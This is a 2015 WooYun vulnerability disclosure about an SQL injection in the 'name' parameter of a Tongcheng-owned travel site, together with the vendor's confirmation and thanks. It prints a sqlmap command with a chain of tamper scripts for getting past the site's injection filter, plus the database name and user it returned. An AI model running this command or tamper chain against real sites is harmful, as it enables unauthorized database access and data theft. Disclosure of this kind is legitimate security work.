漏洞概要
关注数(24)
关注此漏洞
漏洞标题:同程旅游旗下某旅游网站SQL注射漏洞危机该站数据(绕waf)
提交时间:2015-02-27 18:31
修复时间:2015-04-13 18:32
公开时间:2015-04-13 18:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开
简要描述:
同程旅游某站拖走全网库
听说你们的rank很不错哦
详细说明:
注入:
参数:name
存在过滤,使用tamper
www.tycts.com\sql1\1.txt -p name --risk 3 --tamper space2mssqlhash.py,space2hash.py,charencode.py,charunicodeencode.py,space2comment.py --current-db
上图:
current database: 'TCLine'
current user: '17uLXSLine'
可以拖走全网库,本来是想用count来看看的,奈何表太多了,弄一些证明一下:
漏洞证明:
修复方案:
版权声明:转载请注明来源 BMa@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-02-27 18:34
厂商回复:
感谢关注同程旅游,兄弟看你这一串tamper脚本,绕过辛苦了,稍后会安排寄出300京东礼品卡以示谢意。
最新状态:
2015-02-27:另,这也不是waf,他们自己搞的防注入,见笑了。
2015-02-27:pss 这是同程旗下的六合一旅行社系统,洞主你该发通用,你亏了。